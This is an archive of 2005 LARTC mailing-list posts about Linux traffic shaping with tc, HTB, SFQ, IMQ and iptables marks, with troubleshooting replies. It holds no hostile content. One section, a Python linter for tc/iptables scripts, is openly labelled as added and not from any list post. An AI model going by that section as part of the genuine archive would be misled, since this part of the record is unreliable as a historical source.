Ricky -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFB9hXNwfVi6Z6cQK8RAoMNAJ9p8OJ1amuS+y0VKVla/CTZRwuwugCfT3xK rMU221VkLji/lhh3t4xXbKk= =JZ5A -----END PGP SIGNATURE----- From alaios@yahoo.com Tue Jan 25 11:02:31 2005 From: alaios@yahoo.com (Alaios) Date: Tue, 25 Jan 2005 03:02:31 -0800 (PST) Subject: [LARTC] tc filter change/replace In-Reply-To: <20050124192447.GW23931@postel.suug.ch> Message-ID: <20050125110231.58598.qmail@web54701.mail.yahoo.com> Tomas Graf: You mentioned that "All classifier except rsvp are changeable in the latest bk. The patchset has gone in around rc1-bk3-5" Well issue 1 is that in iproute-latest (as well as the one released yesterday) the output of: tc show filter dev eth0 parent ffff:" and change/replace DO NOT WORK. ----------------------------------------------------------------------- filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 police 0x4 rate 20000bit burst 2559b mtu 2kb action reclassify ref -10352222812 bind -8666697856 on the bk version (latest changeLog entry 18-1-2005) as you suggested the output is NOT VERBOSE ENOUGH to see if all parameters are working, but change/replace SEEM TO BE WORKING. Heres the output: filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0 match 0a010102/ffffffff at 12 ISSUE 2 ------- In lots of computers i try to install iproute2 i get an error about db_185.h missing . Issuing a simple apt-get install libdb4.1-dev resolves the problem and the arpd compiles perfectly. Maybe consider documenting that somewhere. --- Thomas Graf wrote: > * Antonios Chalkiopoulos > <200501241402.08307.alg0@iit.demokritos.gr> > 2005-01-24 14:02 > > > > I am wondering whether the commands 'tc filter > change' and 'tc filter replace' > > are working. Googling around revealed a few emails > on the LARTC stating that > > unfoirtunately they do not work. 
A quick check > showed that they are still not > > implemented (properly). > > Some propose a solution to build a second tree of > filters and apply the 2nd > > one when a need for it arises. Howver how can > someone achive the above trick. > > All classifiers except rsvp are changeable in the > latest bk. The > patchset has gone in around rc1-bk3-5. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Take Yahoo! Mail with you! Get it on your mobile phone. http://mobile.yahoo.com/maildemo From andy.furniss@dsl.pipex.com Tue Jan 25 12:23:06 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:23:06 +0000 Subject: [LARTC] Htb, imq and sfq traffic shaping In-Reply-To: <20050124150857.7d530d34@drak.aard.net> References: <20050124150857.7d530d34@drak.aard.net> Message-ID: <41F63A2A.6090604@dsl.pipex.com> Ixen Gerthannes wrote: > Hello, I wrote a simple traffic shaping script (below) that should > have allowed me to shape my internet traffic a bit (ppp0 - adsl > 128kbit/64kbit; local interface eth0). The script works only > partially - the speed is being limited but too much. Without running > this script my download rate is about 10kBytes (with second computer > also downloading at about 6kBytes). After running it my download > speed decreases to about 1..2kBytes and so the second computer. Could > you tell me what have I done wrong ? > > Thank you for replies. Ixen > > -------------- My configuration: If you are shaping on and using PC1 and forwarding traffic for PC2 then you only need one IMQ. You need to send all inbound on ppp0 to it in PREROUTING. Shape egress directly on ppp0. Traffic from the shaping PC will have ppp0s address not eth0s, you need to mark local addresses in postrouting mangle for the queues on ppp0. IMQ needs to be set to hook after nat in prerouting. 
This may be the default AB? To filter inbound local (denatted) ip addresses you can't mark with iptables you need to use tc filters. Remember traffic to/from the shaping PC over ppp0 will have ppp0s address. You need to back off from 128/64 - maybe 100/50, it depends what you want to shape for. There are other tweaks if you really care about latency. You need to sacrifice downstream bandwidth - and upstream unless you are prepared to find link overheads and tweak/patch. Andy. From andy.furniss@dsl.pipex.com Tue Jan 25 12:32:17 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:32:17 +0000 Subject: [LARTC] tail and head drop qdiscs In-Reply-To: <1106170939.10019.23.camel@localhost.localdomain> References: <1106170939.10019.23.camel@localhost.localdomain> Message-ID: <41F63C51.9050207@dsl.pipex.com> vincent perrier wrote: > I think that there are no qdiscs that permit to drop the oldest > frame of a queue when this queue is full, but I would like to > be wrong: > > bfifo drops arriving frames when the max queue length is reached. > > red also drops arriving frames in a more elaborate fashion, with > a drop probability that increases above a limit and becomes > a drop certitude when the max queue length is reached. > > sfq drops "fairly", it piles frames with same (ip source, ip dest, > port source and port dest) and drops a frame from the > biggest pile to favour the smaller flows. > > But I cannot find the qdisc that reacts like a bfifo or red qdisc > but drops the oldest message of the queue when a drop is needed. > > Even better: a qdisc with an autodestruct algorithm for each > frame in the queue that would garantee the "freshness" of > each frame coming out. > > If you know of such qdiscs, please share. > What sort of thing do you want this for? I made a version of esfq head drop for use in specific circumstances. 
The only other thing I thought head drop generally could be usefull for is a game server, but then maybe a policer would be better than a queue WRT latency. Andy. From andy.furniss@dsl.pipex.com Tue Jan 25 12:41:31 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 25 Jan 2005 12:41:31 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200501191657.15767.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> Message-ID: <41F63E7B.30202@dsl.pipex.com> Rio Martin. wrote: > On Wed, 19 Jan 2005 09:19:58 +0100 Tóth Nándor wrote: > Rio Martin. wrote: > >>>Folks, >>>I am a little bit confuse in how to put these packets into correct mangle >>>table for traffic shaping. >>>This is what i ve planned to do: >>> >>>- - - - :eth0 [ LINUX-BOX ] eth1: - - - - >>> >>>Let say: >>>eth0: 220.100.1.1 >>>eth1: 192.168.1.1 >>>eth1:1 192.168.1.2 >>> >>>192.168.1.0/24 get natted into 220.100.1.1 before reaching the internet. >>>I put every packets coming from internet (eth0) this way: >>># iptables -t mangle -I PREROUTING -i eth0 .. * * * * >>> >>>But what if i would like to do the same way with ip 192.168.1.1 and >>>192.168.1.2 ? How to put the packets in correct mangle table? >> >>You can only shape traffic leaving your interface. You have to shape the >>incoming traffic at interface eth1, the outgoing traffic at interface eth0. >>This site is great for learning: >>http://www.knowplace.org/shaper/qdisc.html#egress >>I found to use iptables+CLASSIFY method the easiest way to classify packets. >> >>Your question is a little dizzy... > > > Oopss sorry then :)) > > Actually, there is squid proxy running in my box, with those two private IPs > (192.168.1.1 & 192.168.1.2) > Both get natted to 220.100.1.1. Is there only one proxy running? 
> > I need to shape incoming traffic to both of these ips but i am affraid i have > to face that i am not able to shape traffic which is generate from this box > unless those two IPs were outside the box. Maybe true - maybe not you would need to test with imq. There is also a kernel option to do with nat of local connections. > > If i have one more public IP than i should not so much worry about, cause i > can shape it using IMQ. > > So any other ideas maybe? i'm thinkin just in case IMQ would help .. Possibly - but I don't understand your setup or what you want to shape :-) > Thanks for the info u gave anyway.. > > - Rio.Martin - > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From jacob martinson Tue Jan 25 19:18:51 2005 From: jacob martinson (jacob martinson) Date: Tue, 25 Jan 2005 13:18:51 -0600 Subject: [LARTC] graphing Message-ID: <5b7479590501251118bee421a@mail.gmail.com> Does anyone know what Martin used to generate the graphs in the HTB user guide? http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm Thanks! -Jacob From Andreas.Klauer@metamorpher.de Tue Jan 25 19:35:28 2005 From: Andreas.Klauer@metamorpher.de (Andreas Klauer) Date: Tue, 25 Jan 2005 20:35:28 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <200501252035.29023.Andreas.Klauer@metamorpher.de> On Tuesday 25 January 2005 20:18, jacob martinson wrote: > Does anyone know what Martin used to generate the graphs in the HTB user > guide? Do you mean the class tree graphs? You can use GraphViz to generate those, maybe with the help of a script like http://www.metamorpher.de/files/tc-graph.pl which creates graphs (together with GraphViz 'dot') like these http://www.metamorpher.de/files/fairnat.png (big!). 
If you mean the statistic graphs, maybe these were done with RRDTool or similar. There are scripts that create this kind of graph as well, but I haven't got an example URL handy. Maybe someone else on this list can provide one. HTH Andreas From stef.coene@docum.org Tue Jan 25 19:40:31 2005 From: stef.coene@docum.org (Stef Coene) Date: Tue, 25 Jan 2005 20:40:31 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <200501252040.31194.stef.coene@docum.org> On Tuesday 25 January 2005 20:18, jacob martinson wrote: > Does anyone know what Martin used to generate the graphs in the HTB user > guide? Yep, it's a perl script to process the counters and I gnuplot to create the graph. I used the same scripts to create my graphs, so I downloaded it somewhere from his site. If you can't find the scripts, let me know and I will try to find mine. Stef From vincent-perrier@club-internet.fr Tue Jan 25 19:41:49 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Tue, 25 Jan 2005 20:41:49 +0100 Subject: [LARTC] tail and head drop qdiscs In-Reply-To: <41F63C51.9050207@dsl.pipex.com> References: <1106170939.10019.23.camel@localhost.localdomain> <41F63C51.9050207@dsl.pipex.com> Message-ID: <1106682109.5611.9.camel@localhost.localdomain> > vincent perrier wrote: > > I think that there are no qdiscs that permit to drop the oldest > > frame of a queue when this queue is full ... > What sort of thing do you want this for? > ... > Andy. > Very low rate (satellite links for example) and strict priority can lead to messages waiting for a chance to be transmitted and getting old in low prio queues as higher priority messages take all the bandwidth. Vincent. 
> _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From vincent-perrier@club-internet.fr Tue Jan 25 19:56:59 2005 From: vincent-perrier@club-internet.fr (vincent perrier) Date: Tue, 25 Jan 2005 20:56:59 +0100 Subject: [LARTC] graphing In-Reply-To: <5b7479590501251118bee421a@mail.gmail.com> References: <5b7479590501251118bee421a@mail.gmail.com> Message-ID: <1106683018.5736.4.camel@localhost.localdomain> > Does anyone know what Martin used to generate the graphs in the HTB user guide? > > http://luxik.cdi.cz/~devik/qos/htb/manual/userg.htm > > Thanks! > > -Jacob I think Martin used the following tool to transmit frames: http://luxik.cdi.cz/~devik/qos/ethloop/ and I suppose he used gnuplot to graph, I also did some graphs on HTB visible at http://rawsoft.org with ethloop and gnuplot. Vincent. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From rob0@gmx.co.uk Wed Jan 26 08:15:05 2005 From: rob0@gmx.co.uk (/dev/rob0) Date: Wed, 26 Jan 2005 02:15:05 -0600 Subject: [LARTC] Connection tracking flush In-Reply-To: <1105546032.5000.3.camel@WLESS> References: <1105546032.5000.3.camel@WLESS> Message-ID: <200501260215.05729.rob0@gmx.co.uk> On Wednesday 12 January 2005 10:07, Mpourtounis Dimitris wrote: > Is there a way i can flush the connection tracking on my box (after a > restart in iptables)? > If the connection tracking module is unloaded and reloaded, my job > will be accomplished i think. Only way I know of, other than reboot. > The bad thing is i want this tracking > module to exist in kernel code and not loaded as a module. Why? What's the advantage in that? Maybe if it's a tiny embedded device, but in that case the reboot options sounds viable. 
-- mail to this address is discarded unless "/dev/rob0" or "not-spam" is in Subject: header From junk@yxy.mine.nu Wed Jan 26 10:51:41 2005 From: junk@yxy.mine.nu (junk@yxy.mine.nu) Date: Wed, 26 Jan 2005 12:51:41 +0200 (IST) Subject: [LARTC] Controlling Outbound traffic...alternative to dsl_qos_queue Message-ID: <1059.192.168.1.2.1106736701@yxy.mine.nu> Hi , this probably was asked many times before , but here it goes.. Until now i was using dsl_qos_queue - http://www.sonicspike.net/software/ Which limits outbound traffic and does packet priorites with iptables using MARKed packets.. works very well , I run a ftpserver + webserver so it's usefull to set these 2 with lowest priority and my multiplayer gaming running on certain UDP ports with the highest priority. The problem now is that dsl_qos_queue adds a QUEUE Target to the POSTROUTING chain for reading the MARKed packets , and i recently added a -j ROUTE target for my load balancing configuration to this chain: /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 0 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 1 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 2 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 3 -j ROUTE --oif ppp1 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 4 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 5 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 6 -j ROUTE --oif ppp0 /sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 7 -j ROUTE --oif ppp0 
/sbin/iptables -A POSTROUTING -o ppp+ -t mangle -m owner --cmd-owner pure-ftpd -m nth --every 9 --packet 8 -j ROUTE --oif ppp0 since -j ROUTE is a terminating target it never reaches the QUEUE target.. i need an alternative to dsl_qos_queue i just want to effectivly control only once interface ppp0 it's a cable connection using a l2tp tunnel to the ISP , 1500/128kbit . i know nothing about burts , queue buckets whatever , need a working example.. i have all QoS modules compiled and whatever necessary tools From beatlelittle@yahoo.com.cn Wed Jan 26 10:56:24 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Wed, 26 Jan 2005 18:56:24 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! Message-ID: <20050126105624.21731.qmail@web15505.mail.cnb.yahoo.com> --0-918797084-1106736984=:17715 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit I'm a new comer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong? tc qdisc add dev eth0 root handle 1: htb default 12 tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1 tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20 iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 Thanks a lot! CcM --------------------------------- Do You Yahoo!? 
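An added example (not from any list post, and not part of tc or iptables): a small Python linter over a tc/iptables script that checks the points raised in this message and in the HTB/IMQ script thread earlier in the archive. It reports HTB classes whose parent was never created, `fw` filters whose target class or firewall mark does not exist, and marks set only in mangle PREROUTING, a chain that locally generated packets never traverse. The sample input is constructed from the posted commands with variables expanded; the function names and finding codes are made up for this illustration.

```python
import shlex

# Constructed input: a subset of the commands posted in the two threads, with
# the script's $TC/$DOWNIF/$IPTABLES variables expanded (imq0 = download side).
SAMPLE = """\
tc qdisc add dev eth0 root handle 1: htb default 12
tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
tc qdisc add dev imq0 root handle 1: htb default 99
tc qdisc add dev imq0 parent 1: classid 1:10 htb rate 128kbit
tc class add dev imq0 parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit
tc filter add dev imq0 parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000
iptables -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000
"""


def _opt(tokens, name):
    """Return the token that follows option `name`, or None if absent."""
    if name in tokens[:-1]:
        return tokens[tokens.index(name) + 1]
    return None


def _handle(text):
    """Parse a tc 'major:minor' handle (hex fields, empty minor means 0)."""
    major, _, minor = text.partition(":")
    return (int(major or "0", 16), int(minor or "0", 16))


def lint(script):
    """Return a sorted list of (line_number, code) findings for the script."""
    findings = []
    nodes = {}    # device -> handles of the qdiscs and classes created so far
    marks = {}    # fwmark value -> mangle chains that set it
    filters = []  # (line_number, device, fwmark, target class)
    for lineno, line in enumerate(script.splitlines(), 1):
        tokens = shlex.split(line, comments=True)
        if not tokens:
            continue
        prog = tokens[0].rsplit("/", 1)[-1]   # accept /sbin/tc as well as tc
        if prog == "iptables":
            value = _opt(tokens, "--set-mark")
            if value is not None:
                chain = _opt(tokens, "-A") or _opt(tokens, "-I")
                mark = int(value.split("/")[0], 0)   # drop an optional /mask
                marks.setdefault(mark, set()).add(chain)
            continue
        if prog != "tc" or tokens[2:3] != ["add"]:
            continue
        kind, dev = tokens[1], _opt(tokens, "dev")
        known = nodes.setdefault(dev, set())
        if kind == "qdisc":
            if "classid" in tokens:
                # 'qdisc add' never creates a class; 'class add' was meant.
                findings.append((lineno, "qdisc-add-with-classid"))
            elif _opt(tokens, "handle"):
                known.add(_handle(_opt(tokens, "handle")))
        elif kind == "class":
            if _handle(_opt(tokens, "parent") or "0:") in known:
                known.add(_handle(_opt(tokens, "classid") or "0:"))
            else:
                findings.append((lineno, "class-parent-missing"))
        elif kind == "filter" and "fw" in tokens:
            target = _opt(tokens, "flowid") or _opt(tokens, "classid") or "0:"
            mark = int(_opt(tokens, "handle") or "0", 0)
            filters.append((lineno, dev, mark, _handle(target)))
    for lineno, dev, mark, target in filters:
        if target not in nodes.get(dev, set()):
            findings.append((lineno, "filter-target-missing"))
        chains = marks.get(mark)
        if not chains:
            findings.append((lineno, "fwmark-never-set"))
        elif chains == {"PREROUTING"}:
            # Locally generated packets enter at OUTPUT and skip PREROUTING,
            # so only forwarded or incoming packets carry this mark.
            findings.append((lineno, "fwmark-only-in-prerouting"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, code in lint(SAMPLE):
        print(f"line {lineno}: {code}")
```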

From rio@martin.mu Wed Jan 26 18:04:53 2005
From: rio@martin.mu (Rio Martin.)
Date: Wed, 26 Jan 2005 18:04:53 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <41F63E7B.30202@dsl.pipex.com>
References: <200501191657.15767.rio@martin.mu> <41F63E7B.30202@dsl.pipex.com>
Message-ID: <200501261804.53584.rio@martin.mu>

On Tuesday 25 January 2005 12:41, Andy Furniss wrote:
> Is there only one proxy running?
> > I need to shape incoming traffic to both of these ips but i am afraid i
> > have to face that i am not able to shape traffic which is generate from
> > this box unless those two IPs were outside the box.
> Maybe true - maybe not you would need to test with imq.
> There is also a kernel option to do with nat of local connections.
> > If i have one more public IP than i should not so much worry about, cause
> > i can shape it using IMQ.

I'll make it simple for you as possible.

i have linux box which have eth0 220.1.1.1 as primary ip and aliases: eth0:1
192.168.1.1 , eth0:1 192.168.1.2

Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1
OKay, now my question is:

How do i manage and limit traffic generated from those ips (192.168.1.1 &
192.168.1.2) ? Not just traffic outside, but traffic coming to those ips from
Internet.
I found it so difficult because traffic coming from internet to eth0 will be
using 220.1.1.1 not 192.168.x.x

Thanks ..
- Rio.Martin -

From beatlelittle@yahoo.com.cn Wed Jan 26 11:06:45 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Wed, 26 Jan 2005 19:06:45 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
Message-ID: <20050126110645.72318.qmail@web15504.mail.cnb.yahoo.com>

I'm a newcomer. I have problems using tc+htb. I run the following commands, and expect outgoing ssh flow goes into 1:11. But actually it goes into default 12. What's wrong?

tc qdisc add dev eth0 root handle 1: htb default 12
tc class add dev eth0 parent 1: classid 1:1 htb rate 1000kbit ceil 2000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 100kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 100kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5

iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 20
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN

tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11

Thanks a lot!
CcM

From beatlelittle@yahoo.com.cn Wed Jan 26 11:45:28 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Wed, 26 Jan 2005 19:45:28 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To:
Message-ID: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com>

Sorry, I did not make it clear. The machine I want to do traffic control is a server which runs sshd. I think it should be --sport.
I also tried to use:
        iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j MARK --set-mark 20
the ssh traffic still goes into default 12.

following is the evidence:
bash# tc -s -d class show dev eth0

class htb 1:11 parent 1:1 leaf 111: prio 1 quantum 1000 rate 10Kbit ceil 10Kbit burst 1611b/8 mpu 0b cburst 1611b/8 mpu 0b level 0
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
 lended: 0 borrowed: 0 giants: 0
 tokens: 1031680 ctokens: 1031680

class htb 1:1 root rate 1000Kbit ceil 2000Kbit burst 2879b/8 mpu 0b cburst 4159b/8 mpu 0b level 7
 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0)
 rate 5bps
 lended: 0 borrowed: 0 giants: 0
 tokens: 17818 ctokens: 13004

class htb 1:13 parent 1:1 leaf 113: prio 1 quantum 1280 rate 100Kbit ceil 100Kbit burst 1727b/8 mpu 0b cburst 1727b/8 mpu 0b level 0
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
 lended: 0 borrowed: 0 giants: 0
 tokens: 110592 ctokens: 110592

class htb 1:12 parent 1:1 leaf 112: prio 1 quantum 10240 rate 800Kbit ceil 1600Kbit burst 2623b/8 mpu 0b cburst 3647b/8 mpu 0b level 0
 Sent 21163 bytes 149 pkts (dropped 0, overlimits 0)
 rate 5bps
 lended: 149 borrowed: 0 giants: 0
 tokens: 20225 ctokens: 14208

Mika Hirvonen wrote:
On Wed, 26 Jan 2005 18:56:24 +0800 (CST), CcM wrote:
> I'm a newcomer. I have problems using tc+htb. I run the following commands,
> and expect outgoing ssh flow goes into 1:11. But actually it goes into
> default 12. What's wrong?

> iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark
> 20
> iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN

These two lines should use --dport instead of --sport. The source port
is random.

AFAIR OpenSSH (and probably others) automatically mark their packets
with proper ToS flags, so you should consider using those instead
of port numbers. If you classify ssh traffic by port number only, SSH
file transfers (scp and sftp) end up in the same class as interactive
traffic.

--
Mika Hirvonen

From util@deuroconsult.ro Wed Jan 26 11:58:34 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE)
Date: Wed, 26 Jan 2005 13:58:34 +0200 (EET)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com>
References: <20050126114528.75231.qmail@web15504.mail.cnb.yahoo.com>
Message-ID:

Use:
iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
	--set-mark 20

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From beatlelittle@yahoo.com.cn Wed Jan 26 12:20:50 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Wed, 26 Jan 2005 20:20:50 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To:
Message-ID: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com>

It does work! Thanks!
But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook points in ip stack, but why should be POSTROUTING here when do mangle?

"Catalin(ux aka Dino) BOIE" wrote:
Use:
iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
--set-mark 20

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/

From util@deuroconsult.ro Wed Jan 26 12:42:14 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE)
Date: Wed, 26 Jan 2005 14:42:14 +0200 (EET)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com>
References: <20050126122050.4478.qmail@web15502.mail.cnb.yahoo.com>
Message-ID:

On Wed, 26 Jan 2005, CcM wrote:

> It does work! Thanks!
> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook points in ip stack, but why should be POSTROUTING here when do mangle?
>
> "Catalin(ux aka Dino) BOIE" wrote:
> Use:
> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
> --set-mark 20

Because locally generated packets don't go through PREROUTING.
But, best is to use OUTPUT.

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From andre.correa@pobox.com Wed Jan 26 16:18:16 2005
From: andre.correa@pobox.com (Andre Correa)
Date: Wed, 26 Jan 2005 14:18:16 -0200
Subject: [LARTC] Htb, imq and sfq traffic shaping
In-Reply-To: <20050124150857.7d530d34@drak.aard.net>
References: <20050124150857.7d530d34@drak.aard.net>
Message-ID: <41F7C2C8.3000308@pobox.com>

You shouldn't point your filters to the sfq qdisc, point them to the leaf
classes that have sfq qdiscs as child.

Andre

Ixen Gerthannes wrote:
> Hello,
> I wrote a simple traffic shaping script (below) that should have allowed me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local interface eth0).
> The script works only partially - the speed is being limited but too much. Without running this script my download rate is about 10kBytes (with second computer also downloading at about 6kBytes). After running it my download speed decreases to about 1..2kBytes and so the second computer.
> Could you tell me what have I done wrong ?
>
> Thank you for replies.
> Ixen
>
> --------------
> My configuration:
> Celeron 450MHz, 256MB RAM
> Kernel 2.6.9 patched for imq support (imq devices compiled into kernel)
> iptables 1.2.11 (also patched for imq)
>
> Script:
> #!/bin/sh
>
> DOWNIF='imq0'
> UPIF='imq1'
> rc_done=" done"
> rc_failed=" failed"
>
> TC='/sbin/tc'
> IPTABLES='/usr/sbin/iptables'
> IFCONFIG='/sbin/ifconfig'
> MODPROBE='/sbin/modprobe'
>
> return=$rc_done
>
> tc_reset ()
> {
> # remove old devices if any
> echo "Removing old root qdisc..."
> $TC qdisc del dev $DOWNIF root
> $TC qdisc del dev $UPIF root
> }
>
> tc_status ()
> {
> echo "========================================"
> echo "[qdisc - $DOWNIF]"
> $TC -s qdisc show dev $DOWNIF
> echo "[qdisc - $UPIF]"
> $TC -s qdisc show dev $UPIF
> echo "----------------------------------------"
> echo
> echo "[class - $DOWNIF]"
> $TC -s class show dev $DOWNIF
> echo "[class - $UPIF]"
> $TC -s class show dev $UPIF
> }
>
> tc_showfilter ()
> {
> echo "[filter - $DOWNIF]"
> $TC -s filter show dev $DOWNIF
> echo "[filter - $UPIF]"
> $TC -s filter show dev $UPIF
> }
>
> case "$1" in
>
> start)
> echo "Starting traffic shaping..."
> tc_reset
>
> # setup imq devices - imq0 for download, imq1 for upload
> # $MODPROBE imq numdevs 2
>
> $IFCONFIG imq0 up
> $IFCONFIG imq1 up
>
> # ROOT DEVICE
> echo " Setting root devices for $DOWNIF and $UPIF"
>
> # download
> $TC qdisc add dev $DOWNIF root handle 1: htb default 99
> $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit
> # upload
> $TC qdisc add dev $UPIF root handle 1: htb default 98
> $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit
>
> # ADDRESSES
> echo " 192.168.0.30"
> # 192.168.0.30
> $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit
> $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq
> $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000
>
> $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit
> $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq
> $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000
>
